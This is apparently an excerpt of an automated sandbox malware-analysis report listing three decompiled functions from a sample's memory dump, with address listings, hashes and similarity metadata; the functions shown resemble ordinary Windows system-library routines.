                                                                                                                • Instruction ID: 9b3542355fca2ec6b8e446f8c88c876b361b411cab75d9e9128840da8a14ca43
                                                                                                                • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                                                                • Instruction Fuzzy Hash: FE919D716043419FE728CF25C941B1BB7E6BF88715F14892DF9A9CB281E774EA08CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A151BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E00A151BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xa705f0);
				E009ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E009AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00A153CA(0);
						return E009ED130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E009DF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E009B3690(1, _t117, 0x971810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E009DAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L009B4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E009DAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00A1500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E009D9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                                                0x00a151be
                                                                                                                0x00a151c3
                                                                                                                0x00a151c8
                                                                                                                0x00a151cd
                                                                                                                0x00a151d0
                                                                                                                0x00a151d3
                                                                                                                0x00a151d8
                                                                                                                0x00a151db
                                                                                                                0x00a151de
                                                                                                                0x00a151e0
                                                                                                                0x00a151e3
                                                                                                                0x00a151e6
                                                                                                                0x00a151e8
                                                                                                                0x00a15342
                                                                                                                0x00a15351
                                                                                                                0x00a15356
                                                                                                                0x00a1535a
                                                                                                                0x00a15360
                                                                                                                0x00a15363
                                                                                                                0x00a15366
                                                                                                                0x00a15369
                                                                                                                0x00a15369
                                                                                                                0x00a1536b
                                                                                                                0x00a1536b
                                                                                                                0x00a15370
                                                                                                                0x00a153a3
                                                                                                                0x00a153a4
                                                                                                                0x00a153a6
                                                                                                                0x00a153ab
                                                                                                                0x00a153ab
                                                                                                                0x00a153ae
                                                                                                                0x00a153ae
                                                                                                                0x00a153b5
                                                                                                                0x00a153bf
                                                                                                                0x00a153bf
                                                                                                                0x00a15375
                                                                                                                0x00a15396
                                                                                                                0x00a153a0
                                                                                                                0x00a153a0
                                                                                                                0x00000000
                                                                                                                0x00a15396
                                                                                                                0x00a15377
                                                                                                                0x00a15379
                                                                                                                0x00a1537f
                                                                                                                0x00a1538c
                                                                                                                0x00a15390
                                                                                                                0x00000000
                                                                                                                0x00a15390
                                                                                                                0x00a151ee
                                                                                                                0x00a151f1
                                                                                                                0x00a15301
                                                                                                                0x00a15310
                                                                                                                0x00a15315
                                                                                                                0x00a15318
                                                                                                                0x00a1531b
                                                                                                                0x00a15320
                                                                                                                0x00a1532e
                                                                                                                0x00a15331
                                                                                                                0x00000000
                                                                                                                0x00a15331
                                                                                                                0x00a15328
                                                                                                                0x00a15329
                                                                                                                0x00000000
                                                                                                                0x00a15329
                                                                                                                0x00a151fa
                                                                                                                0x00a15235
                                                                                                                0x00a15236
                                                                                                                0x00a15239
                                                                                                                0x00a1523f
                                                                                                                0x00a15240
                                                                                                                0x00a15241
                                                                                                                0x00a15242
                                                                                                                0x00a15246
                                                                                                                0x00a15247
                                                                                                                0x00a1524e
                                                                                                                0x00a15251
                                                                                                                0x00a15267
                                                                                                                0x00a15269
                                                                                                                0x00a1526e
                                                                                                                0x00a1527d
                                                                                                                0x00a1527e
                                                                                                                0x00a15281
                                                                                                                0x00a15282
                                                                                                                0x00a15287
                                                                                                                0x00a15288
                                                                                                                0x00a1528a
                                                                                                                0x00a1528f
                                                                                                                0x00a15294
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a1529a
                                                                                                                0x00a1529c
                                                                                                                0x00a1529e
                                                                                                                0x00a1529e
                                                                                                                0x00a152a4
                                                                                                                0x00a152b0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a152ba
                                                                                                                0x00a152bc
                                                                                                                0x00a152bc
                                                                                                                0x00a152d4
                                                                                                                0x00a152d9
                                                                                                                0x00a152dc
                                                                                                                0x00a152e1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a152e7
                                                                                                                0x00a152f4
                                                                                                                0x00000000
                                                                                                                0x00a152f4
                                                                                                                0x00a15270
                                                                                                                0x00000000
                                                                                                                0x00a15270
                                                                                                                0x00a151fc
                                                                                                                0x00a151fd
                                                                                                                0x00a15202
                                                                                                                0x00a15203
                                                                                                                0x00a15205
                                                                                                                0x00a1520a
                                                                                                                0x00a1520f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a1521b
                                                                                                                0x00a15226
                                                                                                                0x00a1522b
                                                                                                                0x00a1521d
                                                                                                                0x00a1521d
                                                                                                                0x00a15222
                                                                                                                0x00a15222
                                                                                                                0x00a1522d
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: Legacy$UEFI
                                                                                                                • API String ID: 2994545307-634100481
                                                                                                                • Opcode ID: f19d364064f23dbb9454948ce904138f555bf203e65c0e7efdd6d5333a4009c0
                                                                                                                • Instruction ID: 4ef2f4c77aae17c71c4e05c4310f475662d604727ac24d825933041d157961e8
                                                                                                                • Opcode Fuzzy Hash: f19d364064f23dbb9454948ce904138f555bf203e65c0e7efdd6d5333a4009c0
                                                                                                                • Instruction Fuzzy Hash: 44516CB2E00A18DFDB24DFA8C951BEDB7F8BF88740F14802DE559EB251D6719980CB10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009BB944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 76%
                                                                                                                			E009BB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0xa8d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E009B7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E00A68CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E009D9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E009DB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E009DCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E009B7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							L00A68F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = L009DAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0xa88628; // 0x0
								_v68 = _t77;
								_t78 =  *0xa8862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0xa88628; // 0x0
							_t116 =  *0xa8862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                                0x009bb94c
                                                                                                                0x009bb956
                                                                                                                0x009bb95c
                                                                                                                0x009bb95e
                                                                                                                0x009bb964
                                                                                                                0x009bb969
                                                                                                                0x009bb96d
                                                                                                                0x009bb96d
                                                                                                                0x009bb970
                                                                                                                0x009bb974
                                                                                                                0x009bb97a
                                                                                                                0x009bbadf
                                                                                                                0x009bbadf
                                                                                                                0x009bbae2
                                                                                                                0x009bbae4
                                                                                                                0x009bbae6
                                                                                                                0x009bbaf0
                                                                                                                0x00a02cb8
                                                                                                                0x009bbaf6
                                                                                                                0x009bbaf6
                                                                                                                0x009bbaf6
                                                                                                                0x009bbafd
                                                                                                                0x009bbb1f
                                                                                                                0x009bbb1f
                                                                                                                0x009bbaff
                                                                                                                0x009bbb00
                                                                                                                0x009bbb00
                                                                                                                0x009bbb03
                                                                                                                0x009bbb03
                                                                                                                0x009bbacb
                                                                                                                0x009bbacf
                                                                                                                0x009bbad0
                                                                                                                0x009bbad1
                                                                                                                0x009bbadc
                                                                                                                0x009bbadc
                                                                                                                0x009bb980
                                                                                                                0x009bb980
                                                                                                                0x009bb988
                                                                                                                0x009bb98b
                                                                                                                0x009bb98d
                                                                                                                0x009bb990
                                                                                                                0x009bb993
                                                                                                                0x009bb999
                                                                                                                0x009bb99b
                                                                                                                0x009bb9a1
                                                                                                                0x009bb9a5
                                                                                                                0x009bb9aa
                                                                                                                0x009bb9b0
                                                                                                                0x009bb9bb
                                                                                                                0x009bb9c0
                                                                                                                0x009bb9c3
                                                                                                                0x009bb9ca
                                                                                                                0x009bb9cc
                                                                                                                0x009bb9cf
                                                                                                                0x009bb9d3
                                                                                                                0x009bb9d7
                                                                                                                0x009bba94
                                                                                                                0x009bba94
                                                                                                                0x009bba98
                                                                                                                0x009bbaa3
                                                                                                                0x00a02ccb
                                                                                                                0x009bbaa9
                                                                                                                0x009bbaa9
                                                                                                                0x009bbaa9
                                                                                                                0x009bbab1
                                                                                                                0x00a02cd5
                                                                                                                0x00a02cdd
                                                                                                                0x00a02cdd
                                                                                                                0x009bbabb
                                                                                                                0x009bbabc
                                                                                                                0x009bbac2
                                                                                                                0x009bbac3
                                                                                                                0x009bbac3
                                                                                                                0x009bbac6
                                                                                                                0x00000000
                                                                                                                0x009bb9dd
                                                                                                                0x009bb9dd
                                                                                                                0x009bb9e7
                                                                                                                0x009bb9e7
                                                                                                                0x009bb9ec
                                                                                                                0x009bb9ec
                                                                                                                0x009bb9f1
                                                                                                                0x009bb9f5
                                                                                                                0x009bb9fa
                                                                                                                0x009bba00
                                                                                                                0x009bba0c
                                                                                                                0x009bba10
                                                                                                                0x009bba10
                                                                                                                0x009bba12
                                                                                                                0x009bba18
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009bbb26
                                                                                                                0x009bbb26
                                                                                                                0x009bba1e
                                                                                                                0x009bba1e
                                                                                                                0x009bba23
                                                                                                                0x009bba25
                                                                                                                0x009bba2c
                                                                                                                0x009bba30
                                                                                                                0x009bba35
                                                                                                                0x009bba35
                                                                                                                0x009bba41
                                                                                                                0x009bba46
                                                                                                                0x009bba4c
                                                                                                                0x009bba50
                                                                                                                0x009bba54
                                                                                                                0x009bba6a
                                                                                                                0x009bba6e
                                                                                                                0x009bba70
                                                                                                                0x009bba74
                                                                                                                0x009bba78
                                                                                                                0x009bba7a
                                                                                                                0x009bba7c
                                                                                                                0x009bba8e
                                                                                                                0x009bba90
                                                                                                                0x009bba92
                                                                                                                0x009bbb14
                                                                                                                0x009bbb14
                                                                                                                0x009bbb16
                                                                                                                0x009bbb16
                                                                                                                0x00000000
                                                                                                                0x009bba7c
                                                                                                                0x009bbb0a
                                                                                                                0x009bbb0d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009bbb0f

                                                                                                                APIs
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009BB9A5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                • String ID:
                                                                                                                • API String ID: 885266447-0
                                                                                                                • Opcode ID: 6cc22e96a7ecb3e18670e094b39a5287b5990f77a6ac6411676c450fbde95e2a
                                                                                                                • Instruction ID: 9af5ab0adfddbcf0d3ced3d76589b117647f2d88560e7cf9203fab78a5c8b40e
                                                                                                                • Opcode Fuzzy Hash: 6cc22e96a7ecb3e18670e094b39a5287b5990f77a6ac6411676c450fbde95e2a
                                                                                                                • Instruction Fuzzy Hash: 54515D71A08300CFC720CF68C580A2ABBE9FB88724F64496EF58587395D7B0EC44CB92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0099B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 78%
                                                                                                                			E0099B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0xa6f7a8);
				E009ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E009ED130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E009DD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E009DF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L009EDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E009DB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E009DB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E009DE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E009DA890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                                0x0099b171
                                                                                                                0x0099b171
                                                                                                                0x0099b171
                                                                                                                0x0099b171
                                                                                                                0x0099b171
                                                                                                                0x0099b176
                                                                                                                0x0099b17b
                                                                                                                0x0099b180
                                                                                                                0x0099b186
                                                                                                                0x0099b18f
                                                                                                                0x0099b198
                                                                                                                0x0099b1a4
                                                                                                                0x0099b1aa
                                                                                                                0x009f4802
                                                                                                                0x009f4802
                                                                                                                0x009f4805
                                                                                                                0x009f480c
                                                                                                                0x009f480e
                                                                                                                0x0099b1d1
                                                                                                                0x0099b1d3
                                                                                                                0x0099b1de
                                                                                                                0x0099b1de
                                                                                                                0x009f4817
                                                                                                                0x009f481e
                                                                                                                0x009f4820
                                                                                                                0x009f4822
                                                                                                                0x009f4822
                                                                                                                0x009f4824
                                                                                                                0x009f4824
                                                                                                                0x009f482a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x009f4835
                                                                                                                0x009f483a
                                                                                                                0x009f483d
                                                                                                                0x009f483f
                                                                                                                0x009f4842
                                                                                                                0x009f4842
                                                                                                                0x009f4842
                                                                                                                0x009f4846
                                                                                                                0x009f484c
                                                                                                                0x009f484e
                                                                                                                0x009f4851
                                                                                                                0x009f4851
                                                                                                                0x009f4853
                                                                                                                0x009f4854
                                                                                                                0x009f4854
                                                                                                                0x009f4858
                                                                                                                0x009f485a
                                                                                                                0x009f485a
                                                                                                                0x009f485d
                                                                                                                0x009f485f
                                                                                                                0x009f4861
                                                                                                                0x009f4861
                                                                                                                0x009f4866
                                                                                                                0x009f486b
                                                                                                                0x009f486e
                                                                                                                0x009f4871
                                                                                                                0x009f4876
                                                                                                                0x009f4876
                                                                                                                0x009f4878
                                                                                                                0x009f487b
                                                                                                                0x009f4884
                                                                                                                0x009f4884
                                                                                                                0x00000000
                                                                                                                0x009f487d
                                                                                                                0x009f487d
                                                                                                                0x009f4882
                                                                                                                0x009f4889
                                                                                                                0x009f4889
                                                                                                                0x009f488f
                                                                                                                0x009f4891
                                                                                                                0x009f48e0
                                                                                                                0x009f48e2
                                                                                                                0x009f48e4
                                                                                                                0x009f48e4
                                                                                                                0x009f48e7
                                                                                                                0x009f48e7
                                                                                                                0x009f48ed
                                                                                                                0x009f48f4
                                                                                                                0x009f48f6
                                                                                                                0x009f4951
                                                                                                                0x009f4951
                                                                                                                0x009f4953
                                                                                                                0x009f4953
                                                                                                                0x009f4956
                                                                                                                0x009f4956
                                                                                                                0x009f4958
                                                                                                                0x009f4959
                                                                                                                0x009f4959
                                                                                                                0x009f495d
                                                                                                                0x009f495d
                                                                                                                0x009f495f
                                                                                                                0x009f495f
                                                                                                                0x009f4965
                                                                                                                0x009f4969
                                                                                                                0x009f49ba
                                                                                                                0x009f49ba
                                                                                                                0x009f49c1
